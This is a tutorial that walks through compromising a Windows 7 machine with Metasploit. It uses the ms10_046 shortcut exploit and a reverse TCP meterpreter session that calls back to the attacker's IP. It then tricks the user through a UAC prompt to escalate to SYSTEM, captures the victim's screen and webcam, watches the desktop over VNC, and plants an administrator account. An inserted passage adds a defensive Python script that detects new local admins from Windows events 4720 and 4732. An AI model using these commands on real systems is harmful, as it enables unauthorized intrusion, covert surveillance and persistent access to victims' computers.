
HACK WINDOWS USING METASPLOIT FRAMEWORK

Start metasploit first.

# service postgresql start

# msfconsole (to start Metasploit framework)

#msf > use  exploit/windows/browser/ms10_046_shortcut_icon_dllloader

(exploit means exploiting a vulnerability; DLL means dynamic link library. The
exploit runs code in the background on the victim and we get a session on
Windows 7 known as a meterpreter session)

#msf > set payload windows/meterpreter/reverse_tcp

(Kali delivers a payload, hence we get a reverse TCP connection from the victim
machine back to the Kali machine)

#msf > set SRVHOST  192.168.81.133  (kali machine ip)

#msf > set LHOST 192.168.81.133 (kali machine ip)

#msf > set LPORT 444

#msf > exploit

The screen will give you a URL that must be opened on the victim (Win7)
machine. Copy the partial URL 192.168.81.133\KJqldvPuyU into the browser on
any client machine (the random path at the end differs on each run of the
exploit, so use the one printed on your screen).

http://192.168.81.133/yUqFTYBXVO

CLICK ON ALLOW

A separate window will open; open the link file in it.

Now go to kali machine


Press enter and type

msf > sessions -i 1

meterpreter > getsystem (to get SYSTEM privilege)

(USED TO GET FULL CONTROL)

(you will get an error here because UAC (User Account Control) has not been
bypassed)

priv_elevate_getsystem: Operation failed: The environment is incorrect

You should see that a meterpreter session has been started. You still have to
obtain administrator privilege on the victim PC; for this you must escalate to
administrator with the following commands.

meterpreter > background (keeps current session 1 running in the background and returns to the msf prompt)

msf > use exploit/windows/local/ask

(WE ARE OPENING A UAC DIALOG BOX IN WINDOWS; IF THE USER CLICKS YES,
WE GET FULL CONTROL)

msf exploit(windows/local/ask) > set session 1

msf exploit(windows/local/ask) > exploit

Now the user on Win7 is prompted by UAC; click OK on the victim Win7 PC. After
that, on Kali, another meterpreter session (session 2) is started with
administrator privileges.

meterpreter > getsystem
Now it should succeed.

First, have a look at the victim PC.

meterpreter > screenshot (take victim pc desktop screenshot )

meterpreter > run vnc (to view the victim's remote desktop live, with
view-only permission)

meterpreter > run webcam (only works if the victim PC has a webcam and its
driver is installed)

Add a user to the remote PC and make it a member of the local Administrators
group

Method 1

Apart from these default commands, meterpreter can be further strengthened
by loading extensions. To load an extension, type "use" followed by the
name of that extension.

meterpreter > use incognito

(this command enables add_user, add_localgroup_user and similar commands)

meterpreter > add_user mark 123

meterpreter > add_localgroup_user administrators mark
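From the defender's side, the two commands above leave a clear trace in the Windows Security log: creating a local account logs event ID 4720 and adding a member to a local group logs event ID 4732 (with the built-in Administrators group identified by its well-known SID S-1-5-32-544). The following script is an added example, not part of the original handout, that correlates those two events by the new account's SID within a short time window and raises an alert. The event records are constructed sample data, reduced to a few of the EventData field names Windows actually uses; the machine name WIN7-PC, the user names and the account SID ending in -1005 are made up.

```python
"""Detect a freshly created local account that is immediately added to the
built-in Administrators group (Security events 4720 + 4732).

Added example; the records below are constructed and simplified."""
from datetime import datetime, timedelta

# Well-known SID of the built-in Administrators group.
ADMINISTRATORS_SID = "S-1-5-32-544"
# How close together creation and elevation must be to count as one action.
WINDOW = timedelta(minutes=10)

# Constructed sample events (field names follow Windows EventData names).
# 4720: TargetUserName/TargetSid = the new account.
# 4732: TargetUserName/TargetSid = the group, MemberSid = the account added.
SAMPLE_EVENTS = [
    {"time": "2024-03-01T10:00:05", "id": 4624, "SubjectUserName": "alice"},
    {"time": "2024-03-01T10:01:10", "id": 4720, "SubjectUserName": "alice",
     "TargetUserName": "mark",
     "TargetSid": "S-1-5-21-1111111111-2222222222-3333333333-1005"},
    {"time": "2024-03-01T10:01:12", "id": 4732, "SubjectUserName": "alice",
     "TargetUserName": "Administrators", "TargetSid": ADMINISTRATORS_SID,
     "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1005"},
    # Benign: helpdesk creates a service account and adds it to a non-admin group.
    {"time": "2024-03-01T11:30:00", "id": 4720, "SubjectUserName": "helpdesk",
     "TargetUserName": "svc_backup",
     "TargetSid": "S-1-5-21-1111111111-2222222222-3333333333-1006"},
    {"time": "2024-03-01T11:30:07", "id": 4732, "SubjectUserName": "helpdesk",
     "TargetUserName": "Remote Desktop Users", "TargetSid": "S-1-5-32-555",
     "MemberSid": "S-1-5-21-1111111111-2222222222-3333333333-1006"},
]


def find_new_local_admins(events, window=WINDOW):
    """Return one alert dict per account that was created (4720) and then
    added to Administrators (4732) within `window`, correlated by SID."""
    created = {}  # account SID -> (name, creation time)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["TargetSid"]] = (ev["TargetUserName"], t)
        elif ev["id"] == 4732 and ev.get("TargetSid") == ADMINISTRATORS_SID:
            hit = created.get(ev.get("MemberSid"))
            if hit and t - hit[1] <= window:
                alerts.append({
                    "account": hit[0],
                    "created_at": hit[1].isoformat(),
                    "elevated_at": t.isoformat(),
                    "by": ev["SubjectUserName"],
                })
    return alerts


if __name__ == "__main__":
    for a in find_new_local_admins(SAMPLE_EVENTS):
        print(f"ALERT: local account '{a['account']}' created at {a['created_at']} "
              f"and added to Administrators at {a['elevated_at']} by {a['by']}")
```

Correlating on the account SID rather than the name is deliberate: in real 4732 records the MemberName field is frequently "-" while MemberSid is always filled in. On the sample data only the "mark" account trips the rule; the helpdesk account goes into Remote Desktop Users and is ignored.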

If you are in a Windows command shell and want to go back to meterpreter, type exit

C:\Windows\system32> exit
